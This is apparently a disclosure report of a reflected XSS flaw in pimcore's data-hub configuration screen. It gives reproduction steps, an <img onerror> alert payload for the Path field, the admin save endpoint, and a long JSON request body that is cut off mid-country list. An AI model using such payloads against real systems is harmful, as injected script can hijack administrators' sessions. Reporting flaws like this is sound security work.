Cross-site Scripting (XSS) - Reflected in pimcore/data-hub

Valid

Reported on

Jan 21st 2022


Description

pimcore Datahub is vulnerable to Reflected XSS in the Path of Documents, Assets and Objects in the Security Definition tab

Steps to reproduce

1.Go to https://demo.pimcore.fun/admin/ and login.
2.In the left menu bar, click the Datahub icon and click on any existing configuration then go to the Security Definition tab.
3.In the Security Definition tab, click on Add button in the Path field of Documents, Assets or Objects, input payload <img/src/onerror=alert('xss')>
4.Click Save button, you will see the XSS popup triggers.

POST Request endpoint

/admin/pimcoredatahub/config/save

POST JSON data

{"general":{"active":true,"type":"GraphQL","name":"shop","description":"Shop related information like Orders, OrderItems, Vouchers.","group":"","sqlObjectCondition":""},"schema":{"queryEntities":[{"id":"OnlineShopOrder","name":"OnlineShopOrder","columnConfig":{"columns":[{"attributes":{"attribute":"ordernumber","label":"Ordernumber","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"ordernumber","title":"Ordernumber","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"orderState","label":"OrderState","dataType":"select","layout":{"fieldtype":"select","options":[{"key":"Committed","value":"committed"},{"key":"Cancelled","value":"cancelled"},{"key":"Payment Pending","value":"paymentPending"},{"key":"Aborted","value":"aborted"}],"width":400,"defaultValue":"","optionsProviderClass":"","optionsProviderData":"","queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","dynamicOptions":false,"name":"orderState","title":"OrderState","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"orderdate","label":"Orderdate","dataType":"datetime","layout":{"fieldtype":"datetime","queryColumnType":"bigint(20)","columnType":"bigint(20)","phpdocType":"\\Carbon\\Carbon","defaultValue":null,"useCurrentDate":false,"name":"orderdate","title":"Orderdate","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"items","label":"Items","dataType":"manyToManyObjectRelation","layout":{"fieldtype":"manyToManyObjectRelation","width":"","height":"","maxItems":"","queryColumnType":"text","phpdocType":"array","relationType":true,"visibleFields":null,"optimizedAdminLoading":false,"visibleFieldDefinitions":[],"lazyLoading":false,"classes":[{"classes":"OnlineShopOrderItem"}],"pathFormatterClass":"","name":"items","title":"Items","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"comment","label":"Comment","dataType":"textarea","layout":{"fieldtype":"textarea","width":400,"height":200,"maxLength":null,"showCharCount":null,"excludeFromSearchIndex":false,"queryColumnType":"longtext","columnType":"longtext","phpdocType":"string","name":"comment","title":"Comment","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"customerOrderData","label":"Customer Order Data","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"customerOrderData","title":"Customer Order Data","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"voucherTokens","label":"Voucher Tokens","dataType":"manyToManyObjectRelation","layout":{"fieldtype":"manyToManyObjectRelation","width":"","height":"","maxItems":"","queryColumnType":"text","phpdocType":"array","relationType":true,"visibleFields":null,"optimizedAdminLoading":false,"visibleFieldDefinitions":[],"lazyLoading":false,"classes":[{"classes":"OnlineShopVoucherToken"}],"pathFormatterClass":null,"name":"voucherTokens","title":"Voucher Tokens","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"giftItems","label":"Gift Items","dataType":"manyToManyObjectRelation","layout":{"fieldtype":"manyToManyObjectRelation","width":"","height":"","maxItems":"","queryColumnType":"text","phpdocType":"array","relationType":true,"visibleFields":null,"optimizedAdminLoading":false,"visibleFieldDefinitions":[],"lazyLoading":true,"classes":[{"classes":"OnlineShopOrderItem"}],"pathFormatterClass":"","name":"giftItems","title":"Gift Items","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"subTotalNetPrice","label":"SubTotalNetPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":19,"decimalPrecision":4,"name":"subTotalNetPrice","title":"SubTotalNetPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"subTotalPrice","label":"SubTotalPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":19,"decimalPrecision":4,"name":"subTotalPrice","title":"SubTotalPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"totalNetPrice","label":"TotalNetPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":19,"decimalPrecision":4,"name":"totalNetPrice","title":"TotalNetPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"totalPrice","label":"TotalPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":19,"decimalPrecision":4,"name":"totalPrice","title":"TotalPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"currency","label":"Currency","dataType":"input","layout":{"fieldtype":"input","width":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"currency","title":"Currency","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"customer","label":"Customer","dataType":"manyToOneRelation","layout":{"fieldtype":"manyToOneRelation","width":400,"assetUploadPath":"","relationType":true,"queryColumnType":{"id":"int(11)","type":"enum('document','asset','object')"},"phpdocType":"\\Pimcore\\Model\\Document\\Page | \\Pimcore\\Model\\Document\\Snippet | \\Pimcore\\Model\\Document | \\Pimcore\\Model\\Asset | \\Pimcore\\Model\\DataObject\\AbstractObject","objectsAllowed":true,"assetsAllowed":false,"assetTypes":[],"documentsAllowed":false,"documentTypes":[],"lazyLoading":true,"classes":[{"classes":"Customer"}],"pathFormatterClass":"","name":"customer","title":"Customer","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryFirstname","label":"Firstname","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryFirstname","title":"Firstname","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryLastname","label":"Lastname","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryLastname","title":"Lastname","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryCompany","label":"Company","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryCompany","title":"Company","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryStreet","label":"Street","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryStreet","title":"Street","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryZip","label":"Zip","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryZip","title":"Zip","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"deliveryCity","label":"City","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"deliveryCity","title":"City","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"paymentInfo","label":"Payment Informations","dataType":"fieldcollections","layout":{"fieldtype":"fieldcollections","phpdocType":"\\Pimcore\\Model\\DataObject\\Fieldcollection","allowedTypes":["PaymentInfo"],"lazyLoading":false,"maxItems":"","disallowAddRemove":true,"disallowReorder":true,"collapsed":false,"collapsible":false,"border":false,"name":"paymentInfo","title":"Payment Informations","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"paymentReference","label":"Payment Ref.","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":null,"showCharCount":null,"name":"paymentReference","title":"Payment Ref.","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false}]}},{"id":"OnlineShopOrderItem","name":"OnlineShopOrderItem","columnConfig":{"columns":[{"attributes":{"attribute":"orderState","label":"Order Item State","dataType":"select","layout":{"fieldtype":"select","options":[{"key":"Committed","value":"committed"},{"key":"Cancelled","value":"cancelled"}],"width":400,"defaultValue":"","optionsProviderClass":null,"optionsProviderData":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","dynamicOptions":false,"name":"orderState","title":"Order Item State","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"productNumber","label":"Produktnummer","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":false,"showCharCount":false,"name":"productNumber","title":"Produktnummer","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"productName","label":"Produktname","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":false,"showCharCount":false,"name":"productName","title":"Produktname","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"amount","label":"Amount","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":false,"decimalSize":null,"decimalPrecision":null,"name":"amount","title":"Amount","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"totalNetPrice","label":"NetPrice","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":null,"decimalPrecision":null,"name":"totalNetPrice","title":"NetPrice","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"totalPrice","label":"Price","dataType":"numeric","layout":{"fieldtype":"numeric","width":400,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":null,"decimalSize":null,"decimalPrecision":null,"name":"totalPrice","title":"Price","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":"","datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"pricingRules","label":"Pricing Rules","dataType":"fieldcollections","layout":{"fieldtype":"fieldcollections","phpdocType":"\\Pimcore\\Model\\DataObject\\Fieldcollection","allowedTypes":["PricingRule"],"lazyLoading":true,"maxItems":"","disallowAddRemove":false,"disallowReorder":false,"collapsed":false,"collapsible":false,"border":false,"name":"pricingRules","title":"Pricing Rules","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"comment","label":"Comment","dataType":"textarea","layout":{"fieldtype":"textarea","width":400,"height":"","maxLength":null,"showCharCount":null,"excludeFromSearchIndex":false,"queryColumnType":"longtext","columnType":"longtext","phpdocType":"string","name":"comment","title":"Comment","tooltip":"","mandatory":false,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false}]}},{"id":"OnlineShopVoucherToken","name":"OnlineShopVoucherToken","columnConfig":{"columns":[{"attributes":{"attribute":"tokenId","label":"Token ID","dataType":"numeric","layout":{"fieldtype":"numeric","width":500,"defaultValue":null,"queryColumnType":"double","columnType":"double","phpdocType":"float","integer":false,"unsigned":false,"minValue":null,"maxValue":null,"unique":false,"decimalSize":null,"decimalPrecision":null,"name":"tokenId","title":"Token ID","tooltip":"","mandatory":true,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"token","label":"Token","dataType":"input","layout":{"fieldtype":"input","width":500,"queryColumnType":"varchar","columnType":"varchar","columnLength":255,"phpdocType":"string","regex":"","unique":false,"showCharCount":false,"name":"token","title":"Token","tooltip":"","mandatory":true,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"voucherSeries","label":"Voucher Series","dataType":"manyToOneRelation","layout":{"fieldtype":"manyToOneRelation","width":500,"assetUploadPath":"","relationType":true,"queryColumnType":{"id":"int(11)","type":"enum('document','asset','object')"},"phpdocType":"\\Pimcore\\Model\\Document\\Page | \\Pimcore\\Model\\Document\\Snippet | \\Pimcore\\Model\\Document | \\Pimcore\\Model\\Asset | \\Pimcore\\Model\\DataObject\\AbstractObject","objectsAllowed":true,"assetsAllowed":false,"assetTypes":[],"documentsAllowed":false,"documentTypes":[],"lazyLoading":false,"classes":[{"classes":"OnlineShopVoucherSeries"}],"pathFormatterClass":null,"name":"voucherSeries","title":"Voucher Series","tooltip":"","mandatory":true,"noteditable":true,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false}]}},{"id":"Customer","name":"Customer","columnConfig":{"columns":[{"attributes":{"attribute":"gender","label":"Gender","dataType":"gender","layout":{"fieldtype":"gender","options":[{"key":"male","value":"male"},{"key":"female","value":"female"},{"key":"","value":"unknown"}],"width":"","defaultValue":null,"optionsProviderClass":null,"optionsProviderData":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":"190","phpdocType":"string","dynamicOptions":false,"name":"gender","title":"Gender","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"firstname","label":"Firstname","dataType":"firstname","layout":{"fieldtype":"firstname","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"firstname","title":"Firstname","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"lastname","label":"Lastname","dataType":"lastname","layout":{"fieldtype":"lastname","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"lastname","title":"Lastname","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"company","label":"Company","dataType":"input","layout":{"fieldtype":"input","width":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":false,"name":"company","title":"Company","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"email","label":"Email","dataType":"email","layout":{"fieldtype":"email","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"email","title":"Email","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":true,"visibleSearch":true}},"isOperator":false},{"attributes":{"attribute":"street","label":"Street","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"street","title":"Street","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"zip","label":"Zip","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"zip","title":"Zip","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"countryCode","label":"Country","dataType":"country","layout":{"fieldtype":"country","restrictTo":"","options":[{"key":"Afghanistan","value":"AF"},{"key":"Albania","value":"AL"},{"key":"Algeria","value":"DZ"},{"key":"American Samoa","value":"AS"},{"key":"Andorra","value":"AD"},{"key":"Angola","value":"AO"},{"key":"Anguilla","value":"AI"},{"key":"Antigua and Barbuda","value":"AG"},{"key":"Argentina","value":"AR"},{"key":"Armenia","value":"AM"},{"key":"Aruba","value":"AW"},{"key":"Australia","value":"AU"},{"key":"Austria","value":"AT"},{"key":"Azerbaijan","value":"AZ"},{"key":"Bahamas","value":"BS"},{"key":"Bahrain","value":"BH"},{"key":"Bangladesh","value":"BD"},{"key":"Barbados","value":"BB"},{"key":"Belarus","value":"BY"},{"key":"Belgium","value":"BE"},{"key":"Belize","value":"BZ"},{"key":"Benin","value":"BJ"},{"key":"Bermuda","value":"BM"},{"key":"Bhutan","value":"BT"},{"key":"Bolivia","value":"BO"},{"key":"Bosnia and Herzegovina","value":"BA"},{"key":"Botswana","value":"BW"},{"key":"Brazil","value":"BR"},{"key":"British Indian Ocean Territory","value":"IO"},{"key":"British Virgin Islands","value":"VG"},{"key":"Brunei","value":"BN"},{"key":"Bulgaria","value":"BG"},{"key":"Burkina Faso","value":"BF"},{"key":"Burundi","value":"BI"},{"key":"Cambodia","value":"KH"},{"key":"Cameroon","value":"CM"},{"key":"Canada","value":"CA"},{"key":"Canary Islands","value":"IC"},{"key":"Cape Verde","value":"CV"},{"key":"Caribbean Netherlands","value":"BQ"},{"key":"Cayman Islands","value":"KY"},{"key":"Central African Republic","value":"CF"},{"key":"Ceuta and Melilla","value":"EA"},{"key":"Chad","value":"TD"},{"key":"Chile","value":"CL"},{"key":"China","value":"CN"},{"key":"Christmas Island","value":"CX"},{"key":"Cocos (Keeling) Islands","value":"CC"},{"key":"Colombia","value":"CO"},{"key":"Comoros","value":"KM"},{"key":"Congo - Brazzaville","value":"CG"},{"key":"Congo - Kinshasa","value":"CD"},{"key":"Cook Islands","value":"CK"},{"key":"Costa Rica","value":"CR"},{"key":"Croatia","value":"HR"},{"key":"Cuba","value":"CU"},{"key":"Curaçao","value":"CW"},{"key":"Cyprus","value":"CY"},{"key":"Czech Republic","value":"CZ"},{"key":"Côte d’Ivoire","value":"CI"},{"key":"Denmark","value":"DK"},{"key":"Diego Garcia","value":"DG"},{"key":"Djibouti","value":"DJ"},{"key":"Dominica","value":"DM"},{"key":"Dominican Republic","value":"DO"},{"key":"Ecuador","value":"EC"},{"key":"Egypt","value":"EG"},{"key":"El Salvador","value":"SV"},{"key":"Equatorial Guinea","value":"GQ"},{"key":"Eritrea","value":"ER"},{"key":"Estonia","value":"EE"},{"key":"Ethiopia","value":"ET"},{"key":"Falkland Islands","value":"FK"},{"key":"Faroe Islands","value":"FO"},{"key":"Fiji","value":"FJ"},{"key":"Finland","value":"FI"},{"key":"France","value":"FR"},{"key":"French Guiana","value":"GF"},{"key":"French Polynesia","value":"PF"},{"key":"Gabon","value":"GA"},{"key":"Gambia","value":"GM"},{"key":"Georgia","value":"GE"},{"key":"Germany","value":"DE"},{"key":"Ghana","value":"GH"},{"key":"Gibraltar","value":"GI"},{"key":"Greece","value":"GR"},{"key":"Greenland","value":"GL"},{"key":"Grenada","value":"GD"},{"key":"Guadeloupe","value":"GP"},{"key":"Guam","value":"GU"},{"key":"Guatemala","value":"GT"},{"key":"Guernsey","value":"GG"},{"key":"Guinea","value":"GN"},{"key":"Guinea-Bissau","value":"GW"},{"key":"Guyana","value":"GY"},{"key":"Haiti","value":"HT"},{"key":"Honduras","value":"HN"},{"key":"Hong Kong SAR China","value":"HK"},{"key":"Hungary","value":"HU"},{"key":"Iceland","value":"IS"},{"key":"India","value":"IN"},{"key":"Indonesia","value":"ID"},{"key":"Iran","value":"IR"},{"key":"Iraq","value":"IQ"},{"key":"Ireland","value":"IE"},{"key":"Isle of Man","value":"IM"},{"key":"Israel","value":"IL"},{"key":"Italy","value":"IT"},{"key":"Jamaica","value":"JM"},{"key":"Japan","value":"JP"},{"key":"Jersey","value":"JE"},{"key":"Jordan","value":"JO"},{"key":"Kazakhstan","value":"KZ"},{"key":"Kenya","value":"KE"},{"key":"Kiribati","value":"KI"},{"key":"Kosovo","value":"XK"},{"key":"Kuwait","value":"KW"},{"key":"Kyrgyzstan","value":"KG"},{"key":"Laos","value":"LA"},{"key":"Latvia","value":"LV"},{"key":"Lebanon","value":"LB"},{"key":"Lesotho","value":"LS"},{"key":"Liberia","value":"LR"},{"key":"Libya","value":"LY"},{"key":"Liechtenstein","value":"LI"},{"key":"Lithuania","value":"LT"},{"key":"Luxembourg","value":"LU"},{"key":"Macau SAR China","value":"MO"},{"key":"Macedonia","value":"MK"},{"key":"Madagascar","value":"MG"},{"key":"Malawi","value":"MW"},{"key":"Malaysia","value":"MY"},{"key":"Mali","value":"ML"},{"key":"Malta","value":"MT"},{"key":"Marshall Islands","value":"MH"},{"key":"Martinique","value":"MQ"},{"key":"Mauritania","value":"MR"},{"key":"Mauritius","value":"MU"},{"key":"Mayotte","value":"YT"},{"key":"Mexico","value":"MX"},{"key":"Micronesia","value":"FM"},{"key":"Moldova","value":"MD"},{"key":"Monaco","value":"MC"},{"key":"Mongolia","value":"MN"},{"key":"Montenegro","value":"ME"},{"key":"Montserrat","value":"MS"},{"key":"Morocco","value":"MA"},{"key":"Mozambique","value":"MZ"},{"key":"Myanmar (Burma)","value":"MM"},{"key":"Namibia","value":"NA"},{"key":"Nauru","value":"NR"},{"key":"Nepal","value":"NP"},{"key":"Netherlands","value":"NL"},{"key":"New Caledonia","value":"NC"},{"key":"New Zealand","value":"NZ"},{"key":"Nicaragua","value":"NI"},{"key":"Niger","value":"NE"},{"key":"Nigeria","value":"NG"},{"key":"Niue","value":"NU"},{"key":"Norfolk Island","value":"NF"},{"key":"North Korea","value":"KP"},{"key":"Northern Mariana Islands","value":"MP"},{"key":"Norway","value":"NO"},{"key":"Oman","value":"OM"},{"key":"Pakistan","value":"PK"},{"key":"Palau","value":"PW"},{"key":"Palestinian Territories","value":"PS"},{"key":"Panama","value":"PA"},{"key":"Papua New Guinea","value":"PG"},{"key":"Paraguay","value":"PY"},{"key":"Peru","value":"PE"},{"key":"Philippines","value":"PH"},{"key":"Pitcairn Islands","value":"PN"},{"key":"Poland","value":"PL"},{"key":"Portugal","value":"PT"},{"key":"Puerto Rico","value":"PR"},{"key":"Qatar","value":"QA"},{"key":"Romania","value":"RO"},{"key":"Russia","value":"RU"},{"key":"Rwanda","value":"RW"},{"key":"Réunion","value":"RE"},{"key":"Saint Barthélemy","value":"BL"},{"key":"Saint Helena","value":"SH"},{"key":"Saint Kitts and Nevis","value":"KN"},{"key":"Saint Lucia","value":"LC"},{"key":"Saint Martin","value":"MF"},{"key":"Saint Pierre and Miquelon","value":"PM"},{"key":"Samoa","value":"WS"},{"key":"San Marino","value":"SM"},{"key":"Saudi Arabia","value":"SA"},{"key":"Senegal","value":"SN"},{"key":"Serbia","value":"RS"},{"key":"Seychelles","value":"SC"},{"key":"Sierra Leone","value":"SL"},{"key":"Singapore","value":"SG"},{"key":"Sint Maarten","value":"SX"},{"key":"Slovakia","value":"SK"},{"key":"Slovenia","value":"SI"},{"key":"Solomon Islands","value":"SB"},{"key":"Somalia","value":"SO"},{"key":"South Africa","value":"ZA"},{"key":"South Korea","value":"KR"},{"key":"South Sudan","value":"SS"},{"key":"Spain","value":"ES"},{"key":"Sri Lanka","value":"LK"},{"key":"St. Vincent & Grenadines","value":"VC"},{"key":"Sudan","value":"SD"},{"key":"Suriname","value":"SR"},{"key":"Svalbard and Jan Mayen","value":"SJ"},{"key":"Swaziland","value":"SZ"},{"key":"Sweden","value":"SE"},{"key":"Switzerland","value":"CH"},{"key":"Syria","value":"SY"},{"key":"São Tomé and Príncipe","value":"ST"},{"key":"Taiwan","value":"TW"},{"key":"Tanzania","value":"TZ"},{"key":"Thailand","value":"TH"},{"key":"Timor-Leste","value":"TL"},{"key":"Togo","value":"TG"},{"key":"Tokelau","value":"TK"},{"key":"Tonga","value":"TO"},{"key":"Trinidad and Tobago","value":"TT"},{"key":"Tunisia","value":"TN"},{"key":"Turkey","value":"TR"},{"key":"Turks and Caicos Islands","value":"TC"},{"key":"Tuvalu","value":"TV"},{"key":"U.S. Outlying Islands","value":"UM"},{"key":"U.S. Virgin Islands","value":"VI"},{"key":"Uganda","value":"UG"},{"key":"Ukraine","value":"UA"},{"key":"United Arab Emirates","value":"AE"},{"key":"United 